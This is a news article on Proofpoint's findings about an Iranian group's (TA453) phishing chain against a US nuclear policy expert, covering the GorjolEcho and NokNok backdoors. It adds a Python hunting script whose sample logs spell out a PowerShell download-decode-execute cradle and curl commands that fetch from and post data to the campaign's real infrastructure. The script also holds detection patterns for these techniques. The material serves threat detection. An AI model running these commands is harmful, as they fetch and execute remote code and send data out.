An Iranian state-sponsored threat group known for targeting diplomats, foreign policy experts, and government officials has recently employed a new infection chain and lure in an operation aimed at a nuclear security expert at a United States think tank.
The operation, identified by researchers at Proofpoint, is the work of a group known as Charming Kitten, which supports the interests of the Islamic Revolutionary Guard Corps and has consistently targeted journalists, policy experts, and other key figures in sectors of interest to the Iranian government. Charming Kitten is also known as TA453 and APT42. In the recent operation, the group used a simple, benign email to begin a relationship with the target. The attackers then sent a follow-up email that contained a malicious macro that pointed to a Dropbox URL. That URL hosted a .rar file that in turn contained an LNK file.
“Using a .rar and LNK file to deploy malware differs from TA453’s typical infection chain of using VBA macros or remote template injection. The LNK enclosed in the RAR used PowerShell to download additional stages from a cloud hosting provider,” a new analysis by Proofpoint says.
“Following the dropper using obfuscated PowerShell to call out to the cloud hosting provider, the malware uses the Gorjol function to download base64 encoded content from a .txt file. The downloaded content is decoded and invoked, becoming the function Borjol. Borjol communicates over AES encrypted HTTPS with the attacker-registered subdomain fuschia-rhinestone.cleverapps[.]io via the legitimate Clever Cloud service, which allows users to host JavaScript applications in the cloud. The returned data decrypts into another Borjol function. This new function uses previous variables and results in decrypting the PowerShell backdoor, dubbed GorjolEcho.”
After the backdoor was delivered to the victim, the TA453 attackers eventually realized that it wasn’t working as intended, because the victim’s machine was an Apple and the malware was designed for a Windows system. So the attackers went back to work and redesigned their infection chain to work on macOS and included a new backdoor that Proofpoint calls NokNok. The ZIP archive containing the NokNok backdoor was disguised as a VPN client.
“The bespoke VPN application masquerades as a VPN application GUI. Upon initialization, it executes an Apple script file, which uses curl to download a file from library-store[.]camdvr[.]org/DMPR/[alphanumeric string]. At the time of analysis, library-store.camdvr[.]org was resolving to 144.217.129[.]176, an OVH IP. This second stage is a bash script dubbed NokNok that establishes a backdoor on the system. It generates a system identifier by combining the operating system name, hostname, and a random number. That system identifier is then encrypted with the NokNok function and base64 encoded before being used as the payload of an HTTP POST to library-store.camdvr[.]org,” the analysis says.
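The two execution patterns described above (the Windows stage, where obfuscated PowerShell pulls base64 text from a cloud host, decodes and invokes it; and the macOS stage, where an AppleScript launches curl to fetch the NokNok script) are the kind of behaviour a threat hunter would look for in endpoint process telemetry. The script below is an added example written for this article, not Proofpoint's detection logic or any code from the campaign. It assumes a constructed log format (one JSON object per line with host, parent, image, cmdline and dest fields), assumes the AppleScript is executed through macOS's osascript binary, and uses the defanged indicators quoted in the article as a watchlist; the log lines themselves are constructed, with the path component of the download URL replaced by a placeholder.

```python
"""Hunt for the infection-chain behaviours described in the article in
endpoint process logs. Added example (not Proofpoint's or the campaign's
code); the JSON-lines log format and field names are assumptions."""
from __future__ import annotations

import json
import re

# Indicators as quoted in the article, kept defanged as written there.
WATCHLIST_DOMAINS = {"fuschia-rhinestone.cleverapps[.]io", "library-store.camdvr[.]org"}
WATCHLIST_IPS = {"144.217.129[.]176"}

# Heuristic 1: PowerShell that fetches web content, base64-decodes it and
# invokes the result (the "download base64 text, decode, invoke" stage).
PS_PATTERNS = {
    "download": re.compile(r"(?i)(downloadstring|invoke-webrequest|\biwr\b|net\.webclient)"),
    "base64-decode": re.compile(r"(?i)frombase64string"),
    "invoke": re.compile(r"(?i)(\biex\b|invoke-expression)"),
}


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into the form seen in live telemetry."""
    return indicator.replace("[.]", ".")


def check_event(ev: dict) -> list[str]:
    """Return the reasons an event looks suspicious; an empty list means clean."""
    reasons: list[str] = []
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    cmdline = ev.get("cmdline", "")
    dest = ev.get("dest", "")

    # Heuristic 1: PowerShell download cradle (two of the three traits is enough).
    if image.endswith(("powershell.exe", "pwsh.exe", "pwsh")):
        hits = [name for name, rx in PS_PATTERNS.items() if rx.search(cmdline)]
        if len(hits) >= 2:
            reasons.append("powershell download+decode+invoke: " + ",".join(hits))

    # Heuristic 2: AppleScript (osascript) spawning curl, as the fake VPN app does.
    # Assumption: the Apple script file runs under /usr/bin/osascript.
    if parent.endswith("osascript") and image.endswith("curl"):
        reasons.append("osascript -> curl download")

    # Heuristic 3: network destination on the article's indicator watchlist.
    live_indicators = {refang(i) for i in WATCHLIST_DOMAINS | WATCHLIST_IPS}
    if dest and any(ind in dest for ind in live_indicators):
        reasons.append(f"watchlist destination: {dest}")

    return reasons


def scan(log_text: str) -> list[tuple[str, list[str]]]:
    """Scan JSON-lines telemetry and return (host, reasons) for each hit."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        reasons = check_event(ev)
        if reasons:
            findings.append((ev.get("host", "?"), reasons))
    return findings


# Constructed sample telemetry: two benign events and three that should fire.
# Hosts, paths, the example.invalid domain and the URL placeholder are all made up.
SAMPLE_LOGS = r"""
{"host":"wkst-01","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -w hidden -c \"IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://stage.example.invalid/s.txt'))))\"","dest":"stage.example.invalid"}
{"host":"mac-07","parent":"/bin/bash","image":"/usr/bin/curl","cmdline":"curl -s https://updates.example.invalid/check","dest":"updates.example.invalid"}
{"host":"mac-07","parent":"/usr/bin/osascript","image":"/usr/bin/curl","cmdline":"curl -s -o /tmp/stage http://library-store.camdvr.org/DMPR/ALPHANUMERIC-PLACEHOLDER","dest":"library-store.camdvr.org"}
{"host":"wkst-02","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -c Get-Process","dest":""}
{"host":"mac-07","parent":"/bin/bash","image":"/usr/bin/curl","cmdline":"curl -s -X POST -d @/tmp/id http://144.217.129.176/","dest":"144.217.129.176"}
"""

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_LOGS):
        print(host, "->", "; ".join(reasons))
```

Requiring two of the three PowerShell traits keeps ordinary `Invoke-WebRequest` administration out of the alert stream while still catching the decode-and-invoke cradle; the osascript-to-curl parent/child relationship is rare enough on managed Macs to be worth a standalone rule, and the indicator watchlist is only useful for as long as the infrastructure quoted in the article stays live, so it should be treated as the weakest of the three checks.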
The NokNok backdoor has four discrete modules, each with a separate function, including a module for persistence. There are overlaps between the functionality of NokNok and an older backdoor used by the same threat group, known as GhostEcho. TA453 has shown persistence and versatility in its operations over the years and is continuing to adapt its tools and tactics.
“TA453 continues to significantly adapt its infection chains to complicate detection efforts and conduct cyber espionage operations against its targets of interest. The use of Google Scripts, Dropbox, and CleverApps demonstrates that TA453 continues to subscribe to a multi-cloud approach in its efforts to likely minimize disruptions from threat hunters. TA453’s willingness to port malware to Mach-O also demonstrates how much effort the threat actor is willing to put into pursuing its targets,” the Proofpoint researchers said.